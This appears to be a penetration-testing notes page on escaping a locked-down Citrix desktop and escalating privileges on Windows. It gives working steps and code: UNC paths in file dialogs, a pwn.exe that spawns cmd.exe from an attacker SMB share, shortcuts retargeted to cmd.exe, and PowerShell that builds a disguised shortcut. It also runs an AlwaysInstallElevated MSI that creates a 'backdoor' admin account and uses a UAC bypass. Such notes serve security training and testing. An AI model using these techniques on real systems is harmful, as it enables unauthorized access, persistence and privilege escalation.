# Citrix Breakout

## Install Citrix Receiver

{% embed url="<https://docs.citrix.com/en-us/citrix-workspace-app-for-linux/install.html>" %}

Download Debian package

{% embed url="<https://www.citrix.com/downloads/workspace-app/linux/workspace-app-for-linux-latest.html>" %}

```
osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb
```

If the client fails with "Network data corrupted - HDX has detected corrupted server data, session can not continue":

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FBoVCfCaVTjmJ4stlGTSM%2Fimage.png?alt=media&#x26;token=acbc1676-08d9-4320-b6f6-89fac552a1fc" alt=""><figcaption></figcaption></figure>

Use an older Citrix receiver version:

```
$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb
```

{% embed url="<https://askubuntu.com/questions/1519368/citrix-icaclient-hdx-has-detected-corrupted-server-data-session-can-not-continue>" %}

## Breakout

Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print usually give an attacker an opportunity to invoke a Windows file dialog box. There are multiple ways to open such a dialog from applications that are typically still allowed in a locked-down session, such as Paint, Notepad, or WordPad.

### With Paint

Run `Paint` from start menu and click on `File > Open` to open the Dialog Box.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fk3FDM6Pxs6355WA9j9VE%2Fimage.png?alt=media&#x26;token=409dd3da-10e1-4cd1-b014-e3c60f402e40" alt=""><figcaption></figcaption></figure>

With Paint's Open dialog showing, enter the [UNC](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths) path `\\127.0.0.1\c$\users\pmorgan` in the File name field, set the File Type to `All Files`, and press Enter. Going through the loopback address and the administrative `c$` share reaches the local file system even when drive letters are hidden or blocked by policy, and the dialog lands in the desired directory.

### Create .bat file

{% embed url="<https://0xdf.gitlab.io/2020/06/17/endgame-xen.html>" %}

## Accessing SMB share from restricted environment

Start an Impacket SMB server on the attacker host; the share can then be reached from a dialog box (or from Explorer++) by its UNC path, for example `\\10.13.38.95\share`:

```shell-session
smbserver.py -smb2support share $(pwd)
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fdu2wkvDrNve4zu7px44P%2Fimage.png?alt=media&#x26;token=3b35ffd9-91b7-4da3-b141-f6a7c6773090" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FD59qv0CjZAB5VKky6V47%2Fimage.png?alt=media&#x26;token=5daa663f-2aba-436b-bbb9-89fd69c0df75" alt=""><figcaption></figcaption></figure>

Right-click the `pwn.exe` binary on the share and select `Open`. This prompts us to run it, and a cmd console opens.

pwn.exe:

```c
#include <stdlib.h>

/* Spawns an interactive command prompt; system() blocks until cmd.exe exits,
 * so the console stays open for as long as the shell is in use. */
int main(void) {
  system("C:\\Windows\\System32\\cmd.exe");
  return 0;
}
```

{% embed url="<https://explorerplusplus.com/>" %}

`Explorer++` is a portable file manager that runs directly without installation. It can be used to copy files from `\\10.13.38.95\share` to the Desktop of the user `pmorgan`, and more generally to browse the file system where Windows Explorer itself is blocked.

## Alternate Registry Editors

Alternative registry editors can be used to bypass the standard Group Policy restriction that blocks `regedit.exe`. [Simpleregedit](https://sourceforge.net/projects/simpregedit/), [Uberregedit](https://sourceforge.net/projects/uberregedit/) and [SmallRegistryEditor](https://sourceforge.net/projects/sre/) are examples of such GUI tools.

## Modify existing shortcut file

Right-click an existing shortcut, open `Properties`, and change its `Target` field to:

```
C:\Windows\System32\cmd.exe
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F7LFD6dvFOpzU549d6Bcv%2Fimage.png?alt=media&#x26;token=3774961c-66fb-4329-a99d-66640d38f845" alt=""><figcaption></figcaption></figure>

Other options: transfer a prepared shortcut file through the SMB share, or create a new shortcut file with PowerShell.
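As an added example (not code from the original page), the following PowerShell function builds such a shortcut through the `WScript.Shell` COM object and reads it back so the target can be verified before it is opened. The function and parameter names are the author's own, and the default of dropping `notes.lnk` on the current user's Desktop pointing at `cmd.exe` is an assumption, not something the page prescribes.

```powershell
# Added example, not from the original page. Builds a .lnk with WScript.Shell
# (present on any default Windows install). Names below are the author's own.
function New-CmdShortcut {
    param(
        # Where to write the shortcut; defaults to the current user's Desktop.
        [string]$Path = (Join-Path ([Environment]::GetFolderPath('Desktop')) 'notes.lnk'),
        # What the shortcut launches; cmd.exe is the page's target of choice.
        [string]$Target = 'C:\Windows\System32\cmd.exe',
        # Optional arguments, e.g. '/k whoami' to run a command before the prompt.
        [string]$Arguments = ''
    )

    $shell = New-Object -ComObject WScript.Shell
    $lnk   = $shell.CreateShortcut($Path)
    $lnk.TargetPath       = $Target
    $lnk.Arguments        = $Arguments
    $lnk.WorkingDirectory = Split-Path $Path -Parent
    # Borrow Notepad's icon so the file looks like an ordinary document shortcut.
    $lnk.IconLocation     = 'C:\Windows\System32\notepad.exe,0'
    $lnk.Save()

    # Re-read the file from disk and return what it actually points to, so the
    # caller can confirm the target before double-clicking it in the session.
    $check = $shell.CreateShortcut($Path)
    [PSCustomObject]@{
        Path      = $Path
        Target    = $check.TargetPath
        Arguments = $check.Arguments
    }
}

# Usage: create the shortcut, then open it from the Desktop (or from a file
# dialog such as Paint's, if the Desktop itself is hidden) to get a cmd console.
New-CmdShortcut
```

If PowerShell is blocked inside the session, run the same function on any other Windows machine and copy the resulting `.lnk` over the SMB share; the target path is resolved on the victim only when the shortcut is opened, so the file does not need to be created there.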

## Script Execution

1. Create a new text file and name it `evil.bat`.
2. Open `evil.bat` with a text editor such as Notepad.
3. Enter the command `cmd` into the file and save it; running the batch file then opens a command prompt.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F4efSt5IQr9TNayBoErry%2Fimage.png?alt=media&#x26;token=864925a6-a411-4b63-8448-d0be64b4a3b3" alt=""><figcaption></figcaption></figure>

## Escalating Privileges

Run WinPEAS or PowerUp and check for **AlwaysInstallElevated**. This policy makes Windows Installer run any `.msi` with `SYSTEM` privileges, but it is only in effect when the value is `1` in both the `HKCU` and `HKLM` keys below.

{% content-ref url="miscellaneous-techniques" %}
[miscellaneous-techniques](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/miscellaneous-techniques)
{% endcontent-ref %}

```cmd-session
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1


C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1
```

```powershell-session
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI
	
Output Path
-----------
UserAdd.msi
```
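The following is an added example, not code from the page or from PowerUp: a PowerShell check that reads the value from both hives and only launches the PowerUp-generated `UserAdd.msi` when the policy is actually in effect (PowerUp's own `Get-RegistryAlwaysInstallElevated` performs the same check). The function name and the assumption that `UserAdd.msi` sits in the current directory are the author's.

```powershell
# Added example, not from the original page or from PowerUp.
# Assumes UserAdd.msi (produced by Write-UserAddMSI) is in the current directory.
function Test-AlwaysInstallElevated {
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $results = foreach ($key in $keys) {
        # A missing key or value means the policy is not configured for that hive.
        $prop = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            Hive  = $key.Split(':')[0]
            Value = if ($null -eq $prop) { 0 } else { [int]$prop.AlwaysInstallElevated }
        }
    }
    $results | Format-Table -AutoSize | Out-String | Write-Host
    # Windows Installer honours the policy only when BOTH hives are set to 1.
    return (@($results | Where-Object { $_.Value -eq 1 }).Count -eq 2)
}

if (Test-AlwaysInstallElevated) {
    $msi = Join-Path (Get-Location) 'UserAdd.msi'
    # The installer runs as SYSTEM; PowerUp's MSI creates the 'backdoor' account
    # (password T3st@123, as used with runas below) in the local Administrators group.
    Start-Process msiexec.exe -ArgumentList '/i', "`"$msi`"" -Wait
    net localgroup Administrators   # confirm the new account appears
} else {
    Write-Host 'AlwaysInstallElevated is not set in both hives; this path is closed.'
}
```

Checking both hives before running the installer avoids a noisy failed install when only one of the two values is present, which is a common false positive in enumeration output.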

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FV8aaA7xdlxEXJEesZ3f2%2Fimage.png?alt=media&#x26;token=6bfab547-931e-4acd-b761-e2bb96595bfa" alt=""><figcaption></figcaption></figure>

```cmd-session
C:\> runas /user:backdoor cmd

Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...
```

## Bypass UAC

The `backdoor` account is in the local Administrators group, but the shell started with `runas` runs at medium integrity, so UAC still denies access to protected locations:

```cmd-session
C:\Windows\system32> cd C:\Users\Administrator

Access is denied.
```

Use the sysprep method of `Bypass-UAC.ps1` (FuzzySecurity's PowerShell-Suite) to obtain a high-integrity process:

```powershell-session
PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F2crEYNdaYn9jsYWQVP44%2Fimage.png?alt=media&#x26;token=a6b1bfb2-c3bb-4f1f-971d-e1817c2d5dd9" alt=""><figcaption></figcaption></figure>

